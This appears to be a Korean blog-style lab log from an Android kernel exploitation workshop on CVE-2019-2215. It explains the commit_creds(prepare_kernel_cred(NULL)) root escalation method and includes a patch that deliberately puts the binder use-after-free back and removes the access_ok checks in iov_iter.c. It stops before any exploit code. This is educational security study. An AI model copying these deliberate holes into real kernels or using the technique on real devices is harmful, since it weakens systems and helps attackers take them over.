Android Kernel Exploitation 실습

환경상의 문제로 끝까지 실습을 해보지 못함.

page

android studio 설치

32,64비트확인

sdk tools 는 설치 못했음

path설정

configure 부분보면 create desktop entry 있음

root 계정 : su

세팅에만 4일이 걸렸고, i7 / 16GB 환경인데도 emulator만 돌리면 VM 자체가 멈춰버림. emulator로 하는 것은 포기

Linux Privilege Escalation

목표 : root권한 탈취

1. Light Weight Process

리눅스는 멀티스레딩 지원을 원활하게 하기 위해서 Light Weight Process를 지원한다. 각 Light Weight Process에는 include/linux/sched.h에 정의되어 있는 task_struct 프로세스 관리 구조체가 할당된다.

task_struct structure definition

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
        /*
         * For reasons of header soup (see current_thread_info()), this
         * must be the first element of task_struct.
         */
        struct thread_info              thread_info;
#endif
        /* -1 unrunnable, 0 runnable, >0 stopped: */
        volatile long                   state;

        /*
         * This begins the randomizable portion of task_struct. Only
         * scheduling-critical items should be added above here.
         */
        randomized_struct_fields_start

        void                            *stack;
        atomic_t                        usage;
        /* Per task flags (PF_*), defined further below: */
        unsigned int                    flags;
        unsigned int                    ptrace;

#ifdef CONFIG_SMP
        struct llist_node               wake_entry;
        int                             on_cpu;
#ifdef CONFIG_THREAD_INFO_IN_TASK
        /* Current CPU: */
        unsigned int                    cpu;
#endif
        unsigned int                    wakee_flips;
        unsigned long                   wakee_flip_decay_ts;
        struct task_struct              *last_wakee;

        int                             wake_cpu;
#endif
        int                             on_rq;

        int                             prio;
        int                             static_prio;
        int                             normal_prio;
        unsigned int                    rt_priority;

        const struct sched_class        *sched_class;
        struct sched_entity             se;
        struct sched_rt_entity          rt;
#ifdef CONFIG_SCHED_WALT
        struct ravg ravg;
        /*
         * 'init_load_pct' represents the initial task load assigned to children
         * of this task
         */
        u32 init_load_pct;
        u64 last_sleep_ts;
#endif

#ifdef CONFIG_CGROUP_SCHED
        struct task_group               *sched_task_group;
#endif
        struct sched_dl_entity          dl;

#ifdef CONFIG_PREEMPT_NOTIFIERS
        /* List of struct preempt_notifier: */
        struct hlist_head               preempt_notifiers;
#endif

#ifdef CONFIG_BLK_DEV_IO_TRACE
        unsigned int                    btrace_seq;
#endif

        unsigned int                    policy;
        int                             nr_cpus_allowed;
        cpumask_t                       cpus_allowed;

#ifdef CONFIG_PREEMPT_RCU
        int                             rcu_read_lock_nesting;
        union rcu_special               rcu_read_unlock_special;
        struct list_head                rcu_node_entry;
        struct rcu_node                 *rcu_blocked_node;
#endif /* #ifdef CONFIG_PREEMPT_RCU */

#ifdef CONFIG_TASKS_RCU
        unsigned long                   rcu_tasks_nvcsw;
        u8                              rcu_tasks_holdout;
        u8                              rcu_tasks_idx;
        int                             rcu_tasks_idle_cpu;
        struct list_head                rcu_tasks_holdout_list;
#endif /* #ifdef CONFIG_TASKS_RCU */

        struct sched_info               sched_info;

        struct list_head                tasks;
#ifdef CONFIG_SMP
        struct plist_node               pushable_tasks;
        struct rb_node                  pushable_dl_tasks;
#endif

        struct mm_struct                *mm;
        struct mm_struct                *active_mm;

        /* Per-thread vma caching: */
        struct vmacache                 vmacache;

#ifdef SPLIT_RSS_COUNTING
        struct task_rss_stat            rss_stat;
#endif
        int                             exit_state;
        int                             exit_code;
        int                             exit_signal;
        /* The signal sent when the parent dies: */
        int                             pdeath_signal;
        /* JOBCTL_*, siglock protected: */
        unsigned long                   jobctl;

        /* Used for emulating ABI behavior of previous Linux versions: */
        unsigned int                    personality;

        /* Scheduler bits, serialized by scheduler locks: */
        unsigned                        sched_reset_on_fork:1;
        unsigned                        sched_contributes_to_load:1;
        unsigned                        sched_migrated:1;
        unsigned                        sched_remote_wakeup:1;
#ifdef CONFIG_PSI
        unsigned                        sched_psi_wake_requeue:1;
#endif

        /* Force alignment to the next boundary: */
        unsigned                        :0;

        /* Unserialized, strictly 'current' */

        /* Bit to tell LSMs we're in execve(): */
        unsigned                        in_execve:1;
        unsigned                        in_iowait:1;
#ifndef TIF_RESTORE_SIGMASK
        unsigned                        restore_sigmask:1;
#endif
#ifdef CONFIG_MEMCG
        unsigned                        memcg_may_oom:1;
#ifndef CONFIG_SLOB
        unsigned                        memcg_kmem_skip_account:1;
#endif
#endif
#ifdef CONFIG_COMPAT_BRK
        unsigned                        brk_randomized:1;
#endif
#ifdef CONFIG_CGROUPS
        /* disallow userland-initiated cgroup migration */
        unsigned                        no_cgroup_migration:1;
#endif

        unsigned long                   atomic_flags; /* Flags requiring atomic access. */

        struct restart_block            restart_block;

        pid_t                           pid;
        pid_t                           tgid;

#ifdef CONFIG_CC_STACKPROTECTOR
        /* Canary value for the -fstack-protector GCC feature: */
        unsigned long                   stack_canary;
#endif
        /*
         * Pointers to the (original) parent process, youngest child, younger sibling,
         * older sibling, respectively.  (p->father can be replaced with
         * p->real_parent->pid)
         */

        /* Real parent process: */
        struct task_struct __rcu        *real_parent;

        /* Recipient of SIGCHLD, wait4() reports: */
        struct task_struct __rcu        *parent;

        /*
         * Children/sibling form the list of natural children:
         */
        struct list_head                children;
        struct list_head                sibling;
        struct task_struct              *group_leader;

        /*
         * 'ptraced' is the list of tasks this task is using ptrace() on.
         *
         * This includes both natural children and PTRACE_ATTACH targets.
         * 'ptrace_entry' is this task's link on the p->parent->ptraced list.
         */
        struct list_head                ptraced;
        struct list_head                ptrace_entry;

        /* PID/PID hash table linkage. */
        struct pid_link                 pids[PIDTYPE_MAX];
        struct list_head                thread_group;
        struct list_head                thread_node;

        struct completion               *vfork_done;

        /* CLONE_CHILD_SETTID: */
        int __user                      *set_child_tid;

        /* CLONE_CHILD_CLEARTID: */
        int __user                      *clear_child_tid;

        u64                             utime;
        u64                             stime;
#ifdef CONFIG_ARCH_HAS_SCALED_CPUTIME
        u64                             utimescaled;
        u64                             stimescaled;
#endif
        u64                             gtime;
#ifdef CONFIG_CPU_FREQ_TIMES
        u64                             *time_in_state;
        unsigned int                    max_state;
#endif
        struct prev_cputime             prev_cputime;
#ifdef CONFIG_VIRT_CPU_ACCOUNTING_GEN
        struct vtime                    vtime;
#endif

#ifdef CONFIG_NO_HZ_FULL
        atomic_t                        tick_dep_mask;
#endif
        /* Context switch counts: */
        unsigned long                   nvcsw;
        unsigned long                   nivcsw;

        /* Monotonic time in nsecs: */
        u64                             start_time;

        /* Boot based time in nsecs: */
        u64                             real_start_time;

        /* MM fault and swap info: this can arguably be seen as either mm-specific or thread-specific: */
        unsigned long                   min_flt;
        unsigned long                   maj_flt;

#ifdef CONFIG_POSIX_TIMERS
        struct task_cputime             cputime_expires;
        struct list_head                cpu_timers[3];
#endif

        /* Process credentials: */

        /* Tracer's credentials at attach: */
        const struct cred __rcu         *ptracer_cred;

        /* Objective and real subjective task credentials (COW): */
        const struct cred __rcu         *real_cred;

        /* Effective (overridable) subjective task credentials (COW): */
        const struct cred __rcu         *cred;

        /*
         * executable name, excluding path.
         *
         * - normally initialized setup_new_exec()
         * - access it with [gs]et_task_comm()
         * - lock it with task_lock()
         */
        char                            comm[TASK_COMM_LEN];

        struct nameidata                *nameidata;

#ifdef CONFIG_SYSVIPC
        struct sysv_sem                 sysvsem;
        struct sysv_shm                 sysvshm;
#endif
#ifdef CONFIG_DETECT_HUNG_TASK
        unsigned long                   last_switch_count;
#endif
        /* Filesystem information: */
        struct fs_struct                *fs;

        /* Open file information: */
        struct files_struct             *files;

        /* Namespaces: */
        struct nsproxy                  *nsproxy;

        /* Signal handlers: */
        struct signal_struct            *signal;
        struct sighand_struct           *sighand;
        sigset_t                        blocked;
        sigset_t                        real_blocked;
        /* Restored if set_restore_sigmask() was used: */
        sigset_t                        saved_sigmask;
        struct sigpending               pending;
        unsigned long                   sas_ss_sp;
        size_t                          sas_ss_size;
        unsigned int                    sas_ss_flags;

        struct callback_head            *task_works;

        struct audit_context            *audit_context;
#ifdef CONFIG_AUDITSYSCALL
        kuid_t                          loginuid;
        unsigned int                    sessionid;
#endif
        struct seccomp                  seccomp;

        /* Thread group tracking: */
        u32                             parent_exec_id;
        u32                             self_exec_id;

        /* Protection against (de-)allocation: mm, files, fs, tty, keyrings, mems_allowed, mempolicy: */
        spinlock_t                      alloc_lock;

        /* Protection of the PI data structures: */
        raw_spinlock_t                  pi_lock;

        struct wake_q_node              wake_q;

#ifdef CONFIG_RT_MUTEXES
        /* PI waiters blocked on a rt_mutex held by this task: */
        struct rb_root_cached           pi_waiters;
        /* Updated under owner's pi_lock and rq lock */
        struct task_struct              *pi_top_task;
        /* Deadlock detection and priority inheritance handling: */
        struct rt_mutex_waiter          *pi_blocked_on;
#endif

#ifdef CONFIG_DEBUG_MUTEXES
        /* Mutex deadlock detection: */
        struct mutex_waiter             *blocked_on;
#endif

#ifdef CONFIG_TRACE_IRQFLAGS
        unsigned int                    irq_events;
        unsigned long                   hardirq_enable_ip;
        unsigned long                   hardirq_disable_ip;
        unsigned int                    hardirq_enable_event;
        unsigned int                    hardirq_disable_event;
        int                             hardirqs_enabled;
        int                             hardirq_context;
        unsigned long                   softirq_disable_ip;
        unsigned long                   softirq_enable_ip;
        unsigned int                    softirq_disable_event;
        unsigned int                    softirq_enable_event;
        int                             softirqs_enabled;
        int                             softirq_context;
#endif

#ifdef CONFIG_LOCKDEP
# define MAX_LOCK_DEPTH                 48UL
        u64                             curr_chain_key;
        int                             lockdep_depth;
        unsigned int                    lockdep_recursion;
        struct held_lock                held_locks[MAX_LOCK_DEPTH];
#endif

#ifdef CONFIG_LOCKDEP_CROSSRELEASE
#define MAX_XHLOCKS_NR 64UL
        struct hist_lock *xhlocks; /* Crossrelease history locks */
        unsigned int xhlock_idx;
        /* For restoring at history boundaries */
        unsigned int xhlock_idx_hist[XHLOCK_CTX_NR];
        unsigned int hist_id;
        /* For overwrite check at each context exit */
        unsigned int hist_id_save[XHLOCK_CTX_NR];
#endif

#ifdef CONFIG_UBSAN
        unsigned int                    in_ubsan;
#endif

        /* Journalling filesystem info: */
        void                            *journal_info;

        /* Stacked block device info: */
        struct bio_list                 *bio_list;

#ifdef CONFIG_BLOCK
        /* Stack plugging: */
        struct blk_plug                 *plug;
#endif

        /* VM state: */
        struct reclaim_state            *reclaim_state;

        struct backing_dev_info         *backing_dev_info;

        struct io_context               *io_context;

        /* Ptrace state: */
        unsigned long                   ptrace_message;
        siginfo_t                       *last_siginfo;

        struct task_io_accounting       ioac;
#ifdef CONFIG_PSI
        /* Pressure stall state */
        unsigned int                    psi_flags;
#endif
#ifdef CONFIG_TASK_XACCT
        /* Accumulated RSS usage: */
        u64                             acct_rss_mem1;
        /* Accumulated virtual memory usage: */
        u64                             acct_vm_mem1;
        /* stime + utime since last update: */
        u64                             acct_timexpd;
#endif
#ifdef CONFIG_CPUSETS
        /* Protected by ->alloc_lock: */
        nodemask_t                      mems_allowed;
        /* Seqence number to catch updates: */
        seqcount_t                      mems_allowed_seq;
        int                             cpuset_mem_spread_rotor;
        int                             cpuset_slab_spread_rotor;
#endif
#ifdef CONFIG_CGROUPS
        /* Control Group info protected by css_set_lock: */
        struct css_set __rcu            *cgroups;
        /* cg_list protected by css_set_lock and tsk->alloc_lock: */
        struct list_head                cg_list;
#endif
#ifdef CONFIG_INTEL_RDT
        u32                             closid;
        u32                             rmid;
#endif
#ifdef CONFIG_FUTEX
        struct robust_list_head __user  *robust_list;
#ifdef CONFIG_COMPAT
        struct compat_robust_list_head __user *compat_robust_list;
#endif
        struct list_head                pi_state_list;
        struct futex_pi_state           *pi_state_cache;
#endif
#ifdef CONFIG_PERF_EVENTS
        struct perf_event_context       *perf_event_ctxp[perf_nr_task_contexts];
        struct mutex                    perf_event_mutex;
        struct list_head                perf_event_list;
#endif
#ifdef CONFIG_DEBUG_PREEMPT
        unsigned long                   preempt_disable_ip;
#endif
#ifdef CONFIG_NUMA
        /* Protected by alloc_lock: */
        struct mempolicy                *mempolicy;
        short                           il_prev;
        short                           pref_node_fork;
#endif
#ifdef CONFIG_NUMA_BALANCING
        int                             numa_scan_seq;
        unsigned int                    numa_scan_period;
        unsigned int                    numa_scan_period_max;
        int                             numa_preferred_nid;
        unsigned long                   numa_migrate_retry;
        /* Migration stamp: */
        u64                             node_stamp;
        u64                             last_task_numa_placement;
        u64                             last_sum_exec_runtime;
        struct callback_head            numa_work;

        struct list_head                numa_entry;
        struct numa_group               *numa_group;

        /*
         * numa_faults is an array split into four regions:
         * faults_memory, faults_cpu, faults_memory_buffer, faults_cpu_buffer
         * in this precise order.
         *
         * faults_memory: Exponential decaying average of faults on a per-node
         * basis. Scheduling placement decisions are made based on these
         * counts. The values remain static for the duration of a PTE scan.
         * faults_cpu: Track the nodes the process was running on when a NUMA
         * hinting fault was incurred.
         * faults_memory_buffer and faults_cpu_buffer: Record faults per node
         * during the current scan window. When the scan completes, the counts
         * in faults_memory and faults_cpu decay and these values are copied.
         */
        unsigned long                   *numa_faults;
        unsigned long                   total_numa_faults;

        /*
         * numa_faults_locality tracks if faults recorded during the last
         * scan window were remote/local or failed to migrate. The task scan
         * period is adapted based on the locality of the faults with different
         * weights depending on whether they were shared or private faults
         */
        unsigned long                   numa_faults_locality[3];

        unsigned long                   numa_pages_migrated;
#endif /* CONFIG_NUMA_BALANCING */

        struct tlbflush_unmap_batch     tlb_ubc;

        struct rcu_head                 rcu;

        /* Cache last used pipe for splice(): */
        struct pipe_inode_info          *splice_pipe;

        struct page_frag                task_frag;

#ifdef CONFIG_TASK_DELAY_ACCT
        struct task_delay_info          *delays;
#endif

#ifdef CONFIG_FAULT_INJECTION
        int                             make_it_fail;
        unsigned int                    fail_nth;
#endif
        /*
         * When (nr_dirtied >= nr_dirtied_pause), it's time to call
         * balance_dirty_pages() for a dirty throttling pause:
         */
        int                             nr_dirtied;
        int                             nr_dirtied_pause;
        /* Start of a write-and-pause period: */
        unsigned long                   dirty_paused_when;

#ifdef CONFIG_LATENCYTOP
        int                             latency_record_count;
        struct latency_record           latency_record[LT_SAVECOUNT];
#endif
        /*
         * Time slack values; these are used to round up poll() and
         * select() etc timeout values. These are in nanoseconds.
         */
        u64                             timer_slack_ns;
        u64                             default_timer_slack_ns;

#ifdef CONFIG_KASAN
        unsigned int                    kasan_depth;
#endif

#ifdef CONFIG_FUNCTION_GRAPH_TRACER
        /* Index of current stored address in ret_stack: */
        int                             curr_ret_stack;

        /* Stack of return addresses for return function tracing: */
        struct ftrace_ret_stack         *ret_stack;

        /* Timestamp for last schedule: */
        unsigned long long              ftrace_timestamp;

        /*
         * Number of functions that haven't been traced
         * because of depth overrun:
         */
        atomic_t                        trace_overrun;

        /* Pause tracing: */
        atomic_t                        tracing_graph_pause;
#endif

#ifdef CONFIG_TRACING
        /* State flags for use by tracers: */
        unsigned long                   trace;

        /* Bitmask and counter of trace recursion: */
        unsigned long                   trace_recursion;
#endif /* CONFIG_TRACING */

#ifdef CONFIG_KCOV
        /* Coverage collection mode enabled for this task (0 if disabled): */
        enum kcov_mode                  kcov_mode;

        /* Size of the kcov_area: */
        unsigned int                    kcov_size;

        /* Buffer for coverage collection: */
        void                            *kcov_area;

        /* KCOV descriptor wired with this task or NULL: */
        struct kcov                     *kcov;
#endif

#ifdef CONFIG_MEMCG
        struct mem_cgroup               *memcg_in_oom;
        gfp_t                           memcg_oom_gfp_mask;
        int                             memcg_oom_order;

        /* Number of pages to reclaim on returning to userland: */
        unsigned int                    memcg_nr_pages_over_high;
#endif

#ifdef CONFIG_UPROBES
        struct uprobe_task              *utask;
#endif
#if defined(CONFIG_BCACHE) || defined(CONFIG_BCACHE_MODULE)
        unsigned int                    sequential_io;
        unsigned int                    sequential_io_avg;
#endif
#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
        unsigned long                   task_state_change;
#endif
        int                             pagefault_disabled;
#ifdef CONFIG_MMU
        struct task_struct              *oom_reaper_list;
#endif
#ifdef CONFIG_VMAP_STACK
        struct vm_struct                *stack_vm_area;
#endif
#ifdef CONFIG_THREAD_INFO_IN_TASK
        /* A live task holds one reference: */
        atomic_t                        stack_refcount;
#endif
#ifdef CONFIG_LIVEPATCH
        int patch_state;
#endif
#ifdef CONFIG_SECURITY
        /* Used by LSM modules for access restriction: */
        void                            *security;
#endif

        /*
         * New fields for task_struct should be added above here, so that
         * they are included in the randomized portion of task_struct.
         */
        randomized_struct_fields_end

        /* CPU-specific state of this task: */
        struct thread_struct            thread;

        /*
         * WARNING: on x86, 'thread_struct' contains a variable-sized
         * structure.  It *MUST* be at the end of 'task_struct'.
         *
         * Do not put anything below here!
         */
};


task_struct 구조체는 cred라는 멤버를 가지고있다.

2. Process Credentials

cred struct (include/linux/cred.h.)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
struct cred {
        atomic_t        usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
        atomic_t        subscribers;    /* number of processes subscribed */
        void            *put_addr;
        unsigned        magic;
#define CRED_MAGIC      0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
        kuid_t          uid;            /* real UID of the task */
        kgid_t          gid;            /* real GID of the task */
        kuid_t          suid;           /* saved UID of the task */
        kgid_t          sgid;           /* saved GID of the task */
        kuid_t          euid;           /* effective UID of the task */
        kgid_t          egid;           /* effective GID of the task */
        kuid_t          fsuid;          /* UID for VFS ops */
        kgid_t          fsgid;          /* GID for VFS ops */
        unsigned        securebits;     /* SUID-less security management */
        kernel_cap_t    cap_inheritable; /* caps our children can inherit */
        kernel_cap_t    cap_permitted;  /* caps we're permitted */
        kernel_cap_t    cap_effective;  /* caps we can actually use */
        kernel_cap_t    cap_bset;       /* capability bounding set */
        kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
        unsigned char   jit_keyring;    /* default keyring to attach requested
                                         * keys to */
        struct key __rcu *session_keyring; /* keyring inherited over fork */
        struct key      *process_keyring; /* keyring private to this process */
        struct key      *thread_keyring; /* keyring private to this thread */
        struct key      *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
        void            *security;      /* subjective LSM security */
#endif
        struct user_struct *user;       /* real user ID subscription */
        struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
        struct group_info *group_info;  /* supplementary groups for euid/fsgid */
        /* RCU deletion */
        union {
                int non_rcu;                    /* Can we skip RCU deletion? */
                struct rcu_head rcu;            /* RCU deletion hook */
        };
} __randomize_layout;

커널 익스플로잇에서 루트 권한을 획득하기 위해 가장 흔히 사용되는 방법은 다음과 같다.

1
commit_creds(prepare_kernel_cred(NULL));

prepare_kernel_cred function(kernel/cred.c)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
        const struct cred *old;
        struct cred *new;

        new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
        if (!new)
                return NULL;

        kdebug("prepare_kernel_cred() alloc %p", new);

        if (daemon)
                old = get_task_cred(daemon);
        else
                old = get_cred(&init_cred);

        validate_creds(old);

        *new = *old;
        [...]
        validate_creds(new);
        return new;

error:
        [...]
        return NULL;
}

daemon 인자로 NULL을 전달하면 init_cred를 얻는다. init_cred는 첫 번째 task(init 프로세스)에 부여되는 초기 자격 증명(credential)이다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
/*
 * The initial credentials for the initial task
 */
struct cred init_cred = {
        .usage                  = ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
        .subscribers            = ATOMIC_INIT(2),
        .magic                  = CRED_MAGIC,
#endif
        .uid                    = GLOBAL_ROOT_UID,
        .gid                    = GLOBAL_ROOT_GID,
        .suid                   = GLOBAL_ROOT_UID,
        .sgid                   = GLOBAL_ROOT_GID,
        .euid                   = GLOBAL_ROOT_UID,
        .egid                   = GLOBAL_ROOT_GID,
        .fsuid                  = GLOBAL_ROOT_UID,
        .fsgid                  = GLOBAL_ROOT_GID,
        .securebits             = SECUREBITS_DEFAULT,
        .cap_inheritable        = CAP_EMPTY_SET,
        .cap_permitted          = CAP_FULL_SET,
        .cap_effective          = CAP_FULL_SET,
        .cap_bset               = CAP_FULL_SET,
        .user                   = INIT_USER,
        .user_ns                = &init_user_ns,
        .group_info             = &init_groups,
};

#define GLOBAL_ROOT_UID     (uint32_t)0
#define GLOBAL_ROOT_GID     (uint32_t)0
#define SECUREBITS_DEFAULT  (uint32_t)0x00000000
#define CAP_EMPTY_SET       (uint64_t)0
#define CAP_FULL_SET        (uint64_t)0x3FFFFFFFFF


cred->uid = 0;
cred->gid = 0;
cred->suid = 0;
cred->sgid = 0;
cred->euid = 0;
cred->egid = 0;
cred->fsuid = 0;
cred->fsgid = 0;
cred->securebits = 0;
cred->cap_inheritable.cap[0] = 0;
cred->cap_inheritable.cap[1] = 0;
cred->cap_permitted.cap[0] = 0x3F;
cred->cap_permitted.cap[1] = 0xFFFFFFFF;
cred->cap_effective.cap[0] = 0x3F;
cred->cap_effective.cap[1] = 0xFFFFFFFF;
cred->cap_bset.cap[0] = 0x3F;
cred->cap_bset.cap[1] = 0xFFFFFFFF;
cred->cap_ambient.cap[0] = 0;
cred->cap_ambient.cap[1] = 0;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * commit_creds() - install a new set of credentials on the current task.
 * Excerpt only: the elided parts ([...]) are omitted by this write-up.
 */
int commit_creds(struct cred *new)
{
        struct task_struct *task = current;
        const struct cred *old = task->real_cred;

        [...]

        /* Publish the new credentials on the current task_struct via RCU,
         * replacing both the objective (real_cred) and subjective (cred)
         * pointers — this is what makes the task effectively root when
         * `new` is init_cred. */
        rcu_assign_pointer(task->real_cred, new);
        rcu_assign_pointer(task->cred, new);

        [...]

        return 0;
}

3. SELinux

Security-Enhanced Linux was developed by National Security Agency (NSA) using Linux Security Modules (LSM).

There are two modes of SELinux

  • permissive - permission denials are logged but not enforced
  • enforcing - permission denials are logged and enforced

In Android the default mode of SELinux is enforcing and even if we get root, we are subjected to SELinux rules.

1
2
generic_x86_64:/ $ getenforce                                         
Enforcing

So, we need to disable SELinux as well.

4. SecComp

SecComp stands for Secure Computing mode and is a Linux kernel feature that allows filtering of system calls. When enabled in strict mode, the process can only make four system calls: read(), write(), _exit(), and sigreturn().

When running the exploit from adb shell we are not subjected to seccomp. However, if we bundle the exploit in an Android application, we would be subjected to seccomp.

In this workshop, we are not going to look at seccomp.

Vulnerability Discovery

Use after Free 취약점을가진 CVE-2019-2215을 살펴보자

바인더 하위 시스템이 크롬 샌드박스로부터 도달 할 수 있고 렌더러 익스플로잇과 함께 권한 상승으로 이끌 수 있어 매우 심각한 취약점이다.

  • 2017년 11월에 syzbot이 발견했다
  • 2018년 2월 CVE 번호없이 패치되었다
  • Project Zero의 Maddie Stone (@maddiestone) 이 다시 발견 2019년 9월 27 일에 보고
  • q-goldfish-android-goldfish-4.14-dev 브랜치의 커밋 7a3cee43e935b9d526ad07f20bf005ba7e74d05b 로 패치되었다
1
2
3
4
5
6
7
8
9
10
11
+       /*
+        * If this thread used poll, make sure we remove the waitqueue
+        * from any epoll data structures holding it with POLLFREE.
+        * waitqueue_active() is safe to use here because we're holding
+        * the inner lock.
+        */
+       if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&
+           waitqueue_active(&thread->wait)) {
+               wake_up_poll(&thread->wait, POLLHUP | POLLFREE);
+       }

Vulnerability Trigger

커스텀 패치로 버그가 있던 시점으로부터 KASan을 달고 재빌드한다.

Reintroduction

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
diff --git a/drivers/android/binder.c b/drivers/android/binder.c
index f6ddec245187..55e2748a13e4 100644
--- a/drivers/android/binder.c
+++ b/drivers/android/binder.c
@@ -4768,10 +4768,12 @@ static int binder_thread_release(struct binder_proc *proc,
      * waitqueue_active() is safe to use here because we're holding
      * the inner lock.
      */
+    /*
     if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&
         waitqueue_active(&thread->wait)) {
         wake_up_poll(&thread->wait, POLLHUP | POLLFREE);
     }
+    */

     binder_inner_proc_unlock(thread->proc);

@@ -4781,8 +4783,10 @@ static int binder_thread_release(struct binder_proc *proc,
      * descriptor being closed); ep_remove_waitqueue() holds an RCU read
      * lock, so we can be sure it's done after calling synchronize_rcu().
      */
+    /*
     if (thread->looper & BINDER_LOOPER_STATE_POLL)
         synchronize_rcu();
+    */

     if (send_reply)
         binder_send_failed_reply(send_reply, BR_DEAD_REPLY);
diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index 7b2fd5f251f2..67af61637f55 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -132,19 +132,21 @@

 static int copyout(void __user *to, const void *from, size_t n)
 {
-    if (access_ok(VERIFY_WRITE, to, n)) {
+    /*if (access_ok(VERIFY_WRITE, to, n)) {
         kasan_check_read(from, n);
         n = raw_copy_to_user(to, from, n);
-    }
+    }*/
+    n = raw_copy_to_user(to, from, n);
     return n;
 }

 static int copyin(void *to, const void __user *from, size_t n)
 {
-    if (access_ok(VERIFY_READ, from, n)) {
+    /*if (access_ok(VERIFY_READ, from, n)) {
         kasan_check_write(to, n);
         n = raw_copy_from_user(to, from, n);
-    }
+    }*/
+    n = raw_copy_from_user(to, from, n);
     return n;
 }

.....................................................

ashfaq@hacksys:~/workshop/android-4.14-dev$ cd goldfish/
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git status
Not currently on any branch.
nothing to commit, working tree clean
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git apply ~/workshop/patch/cve-2019-2215.patch
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git status
Not currently on any branch.
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git checkout -- <file>..." to discard changes in working directory)

    modified:   drivers/android/binder.c
    modified:   lib/iov_iter.c

no changes added to commit (use "git add" and/or "git commit -a")

git apply,diff

  • lib/iov_iter.c가 바뀐이유 Patching drivers/android/binder.c is fine and understandable. But, why we need to patch lib/iov_iter.c?

This is because we are also going to use struct iovec as the corruption target as used by Maddie Stone and Jann Horn of Project Zero. However, they wrote the exploit for Android 4.4 kernel which does not have these additional checks in lib/iov_iter.c.

That’s the reason we revert these new checks with a patch. You will have better idea what I’m talking about as we proceed with the workshop.

무슨소리지 도대체?

Build Kernel With KASan

workshop/build-configs/goldfish.x86_64.kasan 파일에서 build용 kasan을 찾을 수 있다. 이걸 이용해 빌드한다.

1
2
3
4
5
6
7
8
9
10
11
12
13
ashfaq@hacksys:~/workshop/android-4.14-dev$ BUILD_CONFIG=../build-configs/goldfish.x86_64.kasan build/build.sh

ashfaq@hacksys:~/workshop/android-4.14-dev$ nm out/kasan/dist/vmlinux | grep kasan | head 
000000004cfd027e A __crc_kasan_check_read
000000009da7c655 A __crc_kasan_check_write
0000000074961168 A __crc_kasan_kmalloc
